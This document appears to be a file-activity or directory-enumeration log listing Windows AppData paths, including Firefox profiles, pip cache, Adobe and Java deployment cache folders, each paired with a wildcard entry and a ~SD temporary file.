C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\~SDFFB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\*
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\~SD102B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\*
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\~SD106B.tmp
C:\Users\user\AppData\Local\Mozilla\*
C:\Users\user\AppData\Local\Mozilla
C:\Users\user\AppData\Local\Mozilla\~SD108B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\*
C:\Users\user\AppData\Local\Mozilla\Firefox
C:\Users\user\AppData\Local\Mozilla\Firefox\~SD10DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\~SD10DB.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD10DC.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\~SD10ED.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\~SD114B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\~SD117B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\~SD11DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\~SD1239.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\~SD123A.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\~SD1279.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\*
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD1299.tmp
C:\Users\user\AppData\Local\Package Cache\*
C:\Users\user\AppData\Local\Package Cache
C:\Users\user\AppData\Local\Package Cache\~SD12BA.tmp
C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\*
C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}
C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\~SD12EA.tmp
C:\Users\user\AppData\Local\pip\*
C:\Users\user\AppData\Local\pip
C:\Users\user\AppData\Local\pip\~SD130A.tmp
C:\Users\user\AppData\Local\pip\cache\*
C:\Users\user\AppData\Local\pip\cache
C:\Users\user\AppData\Local\pip\cache\~SD1359.tmp
C:\Users\user\AppData\Local\pip\cache\http\*
C:\Users\user\AppData\Local\pip\cache\http
C:\Users\user\AppData\Local\pip\cache\http\~SD136A.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\*
C:\Users\user\AppData\Local\pip\cache\http\4
C:\Users\user\AppData\Local\pip\cache\http\4\~SD1399.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\*
C:\Users\user\AppData\Local\pip\cache\http\4\e
C:\Users\user\AppData\Local\pip\cache\http\4\e\~SD13D9.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\*
C:\Users\user\AppData\Local\pip\cache\http\4\e\e
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\~SD1428.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\*
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\~SD1448.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\*
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\~SD14A7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\*
C:\Users\user\AppData\Local\pip\cache\http\8
C:\Users\user\AppData\Local\pip\cache\http\8\~SD14D7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\*
C:\Users\user\AppData\Local\pip\cache\http\8\8
C:\Users\user\AppData\Local\pip\cache\http\8\8\~SD14F7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\*
C:\Users\user\AppData\Local\pip\cache\http\8\8\6
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\~SD1517.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\*
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\~SD1528.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\*
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\~SD1539.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\*
C:\Users\user\AppData\Local\pip\cache\http\a
C:\Users\user\AppData\Local\pip\cache\http\a\~SD1578.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\*
C:\Users\user\AppData\Local\pip\cache\http\a\1
C:\Users\user\AppData\Local\pip\cache\http\a\1\~SD1598.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\*
C:\Users\user\AppData\Local\pip\cache\http\a\1\9
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\~SD15B9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\*
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\~SD15C9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\*
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\~SD15EA.tmp
C:\Users\user\AppData\Local\pip\cache\selfcheck\*
C:\Users\user\AppData\Local\pip\cache\selfcheck
C:\Users\user\AppData\Local\pip\cache\selfcheck\~SD160A.tmp
C:\Users\user\AppData\LocalLow\*
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\~SD163A.tmp
C:\Users\user\AppData\LocalLow\Adobe\*
C:\Users\user\AppData\LocalLow\Adobe
C:\Users\user\AppData\LocalLow\Adobe\~SD165A.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\*
C:\Users\user\AppData\LocalLow\Adobe\Acrobat
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\~SD1699.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\*
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\~SD16F8.tmp
C:\Users\user\AppData\LocalLow\Adobe\Linguistics\*
C:\Users\user\AppData\LocalLow\Adobe\Linguistics
C:\Users\user\AppData\LocalLow\Adobe\Linguistics\~SD1747.tmp
C:\Users\user\AppData\LocalLow\Microsoft\*
C:\Users\user\AppData\LocalLow\Microsoft
C:\Users\user\AppData\LocalLow\Microsoft\~SD17A6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\*
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\~SD17E6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\*
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\~SD1883.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\*
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\~SD1910.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\*
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\~SD19BD.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\*
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\~SD19DE.tmp
C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\*
C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage
C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\~SD1A0D.tmp
C:\Users\user\AppData\LocalLow\Mozilla\*
C:\Users\user\AppData\LocalLow\Mozilla
C:\Users\user\AppData\LocalLow\Mozilla\~SD1A2E.tmp
C:\Users\user\AppData\LocalLow\Sun\*
C:\Users\user\AppData\LocalLow\Sun
C:\Users\user\AppData\LocalLow\Sun\~SD1A7D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\*
C:\Users\user\AppData\LocalLow\Sun\Java
C:\Users\user\AppData\LocalLow\Sun\Java\~SD1A9D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\~SD1ABD.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\~SD1AED.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\~SD1B6B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\~SD1BBA.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\~SD1BDB.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\~SD1C39.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\~SD1C79.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\~SD1CD8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\~SD1CF8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\~SD1D37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\~SD1D67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\~SD1DB6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\~SD1DE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\~SD1DF7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\~SD1E17.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\~SD1E37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\~SD1E67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\~SD1E87.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\~SD1ED7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\~SD1EE7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\~SD1F07.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\~SD1F28.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\~SD1F77.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\~SD1FA7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\~SD1FE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\~SD2035.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\~SD2065.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\~SD2095.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\~SD20B5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\~SD20E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\~SD2144.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\~SD2155.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\~SD2175.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\~SD21B4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\~SD21E4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\~SD21F5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\~SD2234.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\~SD2264.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\~SD2284.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\~SD2295.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\~SD2296.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\~SD22E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\~SD22F6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\~SD2316.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\~SD2356.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\~SD2376.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\~SD2396.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\~SD23C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\~SD2425.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\~SD2435.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\~SD2456.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\~SD24C4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\~SD24C5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\~SD24C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\~SD2505.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\~SD2535.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\~SD2556.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\~SD2566.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\~SD2577.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\~SD2587.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\~SD25A8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\~SD25C8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\~SD25F8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\~SD2618.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\~SD2629.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\~SD262A.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\~SD262B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\~SD262C.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\~SD262D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\~SD262E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\*
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security
